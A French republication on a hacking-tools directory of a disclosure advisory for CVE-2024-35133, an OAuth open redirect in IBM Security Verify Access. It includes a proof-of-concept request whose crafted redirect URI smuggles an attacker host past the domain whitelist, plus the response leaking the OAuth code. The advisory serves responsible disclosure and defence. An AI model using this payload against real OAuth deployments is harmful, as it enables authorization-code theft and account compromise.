Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
IBM-Security-Verify-oAuth_Token_Steal-CVE-2024-35133 — Bulletin de sécurité pour CVE-2024-35133 - Avec PoC | Kitploit
Outils/GitHubGitHub/ozozuz/ibm-security-verify-oauth_token_steal-cve-2024-35133
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubozozuz/ibm-security-verify-oauth_token_steal-cve-2024-35133

IBM-Security-Verify-oAuth_Token_Steal-CVE-2024-35133

Bulletin de sécurité pour CVE-2024-35133 - Avec PoC

Voir le dépôt
21il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

IBM Security Verify Access - Redirection ouverte lors du flux OAuth (CVE-2024-35133)

Table des matières

  1. Vue d'ensemble
  2. Description détaillée
  3. Preuve de concept
  4. Solution
  5. Chronologie de divulgation
  6. Références
  7. Crédits
  8. Mentions légales

Vue d'ensemble

Révision: 1.0
Impact:
En persuadant une victime de visiter un site web spécialement conçu, un attaquant distant pourrait exploiter cette vulnérabilité pour usurper l'URL affichée et rediriger l'utilisateur vers un site web malveillant. Cela pourrait permettre à l'attaquant d'obtenir des informations hautement sensibles ou de mener d'autres attaques contre la victime.

Sévérité:

  • NIST: Élevée
  • IBM: Moyenne

Score CVSS:

  • NIST: 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
  • IBM: 6.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N)

CVE-ID: CVE-2024-35133

Fournisseur: IBM

Produits concernés:

  • IBM Security Verify Access
  • IBM Security Verify Access Docker
  • Versions concernées: 10.0.0 - 10.0.8

    Description du produit

    IBM Security Verify Access est une solution complète de gestion des politiques de sécurité réseau et d'autorisation. Elle fournit une protection de bout en bout des ressources sur des intranets et extranets géographiquement dispersés.

    Parmi les principales fonctionnalités, on trouve :

    • Authentification: Large gamme d'authentificateurs intégrés et prise en charge d'authentificateurs externes.
    • Autorisation: Décisions sécurisées d'autorisation ou de refus pour les demandes de ressources protégées.
    • Sécurité des données et gestion centralisée des ressources: Gère l'accès sécurisé aux ressources réseau internes en utilisant la connectivité Internet publique via un pare-feu d'entreprise.

    Description détaillée

    Lors d'un test d'intrusion du flux OAuth pour un client, une vulnérabilité de redirection ouverte a été découverte, permettant la fuite de la variable « code » d'OAuth.

    En contournant la logique de l'analyseur chargé de vérifier le paramètre « redirect_uri » lors d'un flux OAuth (en exploitant la RFC 3986), l'attaquant pouvait manipuler le filtre de liste blanche des domaines dans IBM Security Verify Access. Cela aboutissait à une redirection ouverte vers n'importe quel domaine arbitraire contrôlé par l'attaquant. La victime pouvait être redirigée vers un site malveillant alors que le domaine semblait de confiance.

    Cela pourrait conduire à l'exposition d'informations sensibles telles que le jeton « code » d'OAuth ou à d'autres attaques contre la victime.


    Preuve de concept

    Requête

    root@kitploit:~
    GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
    Host: [REDACTED]
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    Te: trailers
    Connection: close
    

    Réponse

    root@kitploit:~
    HTTP/1.1 302 Found 
    content-language: en-US 
    date: Tue, 19 Mar 2024 16:04:35 GMT 
    location: https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED] 
    p3p: CP="NON CUR OTPi OUR NOR UNI" 
    x-frame-options: DENY 
    x-content-type-options: nosniff 
    cache-control: no-store 
    x-xss-protection: 1; mode=block 
    x-permitted-cross-domain-policies: none 
    cross-origin-resource-policy: same-site 
    content-security-policy: frame-ancestors 'none' 
    referrer-policy: no-referrer-when-downgrade 
    strict-transport-security: max-age=31536000; includeSubDomains 
    pragma: no-cache 
    Content-Length: 0.
    

    Solution

    Reportez-vous au Bulletin de sécurité IBM 7166712 pour obtenir des informations sur les correctifs, les mises à niveau ou les solutions de contournement suggérées.
    Voir Références pour plus de détails.


    Chronologie de divulgation

    • 19/03/2024: Vulnérabilité découverte par le chercheur en sécurité (Giulio Garzia)
    • 21/03/2024: Vulnérabilité partagée avec le client utilisant IBM Security Verify Access
    • 02/04/2024: Vulnérabilité signalée à IBM
    • 14/05/2024: Vulnérabilité confirmée par IBM
    • 18/07/2024: Correctif de pré-version fourni par IBM au client
    • 27/08/2024: Bulletin de sécurité et vulnérabilité communiqués par IBM

    Références

    1. Bulletin de sécurité IBM CVE-2024-35133
    2. Base de données des vulnérabilités IBM X-Force
    3. NIST CVE-2024-35133
    4. CWE-178: Gestion inappropriée de l'URL

    Crédits

    Cette vulnérabilité a été découverte et signalée par :

    • Giulio Garzia
      LinkedIn
      GitHub

    Mentions légales

    Copyright (c) 2024 Giulio Garzia « Ozozuz »

    La redistribution électronique de cette alerte est autorisée. Elle ne peut être modifiée sans le consentement écrit explicite de l'auteur. Pour obtenir l'autorisation de reproduire cette alerte dans d'autres médias, contactez l'auteur.

    Avertissement: Les informations contenues dans cet avis sont exactes au moment de la publication, sur la base des données disponibles. Aucune garantie n'est fournie. Ni l'auteur ni l'éditeur n'acceptent de responsabilité pour les dommages directs, indirects ou consécutifs découlant de l'utilisation de ces informations.

    Télécharger l’outil